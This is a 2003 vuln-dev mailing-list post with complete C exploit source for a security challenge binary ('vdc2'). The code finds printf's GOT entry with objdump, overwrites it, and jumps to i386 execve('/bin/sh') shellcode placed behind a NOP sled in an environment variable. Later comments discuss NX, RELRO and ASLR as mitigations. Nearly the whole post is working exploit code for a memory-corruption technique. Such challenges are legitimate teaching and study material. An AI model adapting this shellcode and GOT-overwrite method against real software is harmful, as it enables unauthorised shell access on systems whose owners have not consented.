[Vuln-dev Challenge] example exploit for 2

ot_at_hushmail.com
Date: 05/24/03

    Date: Sat, 24 May 2003 09:18:47 -0700
    To: vuln-dev@securityfocus.com
    
    

    example exploit for vuln-dev challenge 2, requires the address
    of the shellcode in the environment as an argument

    /*
     * example exploit code for vuln-dev challenge 2
     *
     * we overwrite printf's got table entry to point to our
     * shellcode in the environment
     *
     * omicron tau - ot@hushmail.com
     */

    /*
     * objdump, grep, and awk need to be in your path
     *
     * tested on linux 2.4.20 using env address 0xbfffe2ac
     *
     * rm db.log first
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Target of the exercise: the challenge binary, expected in the current directory. */
    #define VULNPATH "./vdc2" /* path to vulnerable binary */

    /*
     * /bin/sh
     *
     * Payload bytes for i386 Linux: the code issues int 0x80 (\xcd\x80) with
     * al = 0x0b (\xb0\x0b, the execve syscall number) on the "/bin/sh" string
     * stored near the end of the array (\x2f\x62\x69\x6e\x2f\x73\x68); the
     * bytes after that string are printable filler.
     * No byte in the array is 0x00, so strlen(shellcode) in main() covers the
     * whole payload.
     * The payload is placed in an environment variable by main(); it can run
     * only if the memory holding the target's environment is executable, so a
     * non-executable stack (NX) stops it.
     */
    char shellcode[]=
        "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
        "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
        "\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
        "\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62"
        "\x63\x64\x65";

    /* Written by find_got_addr(), read by main() when it fills argv[1]. */
    unsigned int go; /* GOT entry address for printf */

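    /*
     * Look up the GOT slot for printf in VULNPATH and store it in `go`.
     *
     * Runs `objdump -R` through the shell and takes the first relocation line
     * that mentions " printf", so objdump, grep and awk must be on PATH.  The
     * command string is built only from the compile-time constant VULNPATH;
     * it must never be given a caller-supplied path, because popen() hands
     * the whole string to the shell.
     *
     * Exits with status 1 if the pipeline cannot be started or yields no
     * parsable address, rather than reading through a NULL FILE pointer or
     * parsing an uninitialised buffer.
     *
     * Defensive context: the slot located here is writable at run time only
     * when the target is linked without full RELRO (-Wl,-z,relro,-z,now).
     */
    void
    find_got_addr()
    {
            FILE *p;
            char buf[1024];
            char *end;

            /* The mail archive had wrapped this literal mid-string; rejoined. */
            snprintf(buf, sizeof(buf),
                "objdump -R %s | grep ' printf' | "
                "awk '{ print \"0x\"$1 }'", VULNPATH);

            p = popen(buf, "r");
            if (p == NULL) {
                    perror("popen");
                    exit(1);
            }
            if (fgets(buf, sizeof(buf), p) == NULL) {
                    /* Empty output: no matching relocation, or a tool is missing. */
                    pclose(p);
                    fputs("vdc2x: no printf relocation found\n", stderr);
                    exit(1);
            }
            pclose(p);

            go = strtoul(buf, &end, 0);
            if (end == buf) {
                    fputs("vdc2x: could not parse objdump output\n", stderr);
                    exit(1);
            }

            /*
             * Author's fixed adjustment of -2; the post does not say why.
             * NOTE(review): presumably specific to how the challenge binary
             * performs its write -- confirm against the target's source.
             */
            go -= 2;

            printf("[!] using got addr 0x%x\n", go);
    }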

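    /*
     * Build the two arguments and the environment for the challenge binary,
     * then exec it.
     *
     *   argv[1] of the target (obuf):  128 bytes made of the 4-byte value `go`
     *                                  (printf's GOT slot, see find_got_addr())
     *                                  repeated 32 times.
     *   argv[2] of the target (scbuf): the 4-byte address given on our own
     *                                  command line.
     *   environment variable SC:       8191 bytes of 0x90 with `shellcode`
     *                                  copied in at offset 8000.
     *
     * The address argument is supplied by hand because the author relied on a
     * fixed environment address (0xbfffe2ac on linux 2.4.20, per the header
     * comment).  Stack address randomisation makes that value unstable, full
     * RELRO makes the GOT slot read-only, and a non-executable stack keeps
     * the SC variable from being run.  A multi-kilobyte run of 0x90 in an
     * environment variable is also an easy thing to alert on.
     *
     * Returns 1 if the target could not be executed; on success execl() does
     * not return.
     */
    int
    main(int argc, char *argv[])
    {
            char envbuf[8192];
            char obuf[129];
            char scbuf[5];
            unsigned int scaddr;
            size_t i; /* unsigned, to match the sizeof() bound below */

            if (argc < 2) {
                    fputs("vdc2x: usage: vdc2x scaddr\n", stderr);
                    exit(1);
            }
            scaddr = strtoul(argv[1], NULL, 0);

            find_got_addr();

            /* Fill all but the terminator with copies of the 4-byte `go`. */
            memset(obuf, 0, sizeof(obuf));
            for (i = 0; i < sizeof(obuf) - 1; i += 4)
                    memcpy(&obuf[i], &go, 4);
            obuf[sizeof(obuf) - 1] = 0;

            /* 0x90 padding, payload at a fixed offset, NUL-terminated. */
            memset(envbuf, 0x90, sizeof(envbuf));
            memcpy(&envbuf[8000], shellcode, strlen(shellcode));
            envbuf[sizeof(envbuf) - 1] = 0;
            if (setenv("SC", envbuf, 1) != 0) {
                    perror("setenv");
                    exit(1);
            }

            memcpy(scbuf, &scaddr, 4);
            scbuf[4] = 0;
            /* The variadic sentinel must be a pointer, hence the cast. */
            execl(VULNPATH, "./vdc2", obuf, scbuf, (char *)NULL);

            /* Reached only when execl() failed; report it instead of exiting 0. */
            perror("execl");
            return(1);
    }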


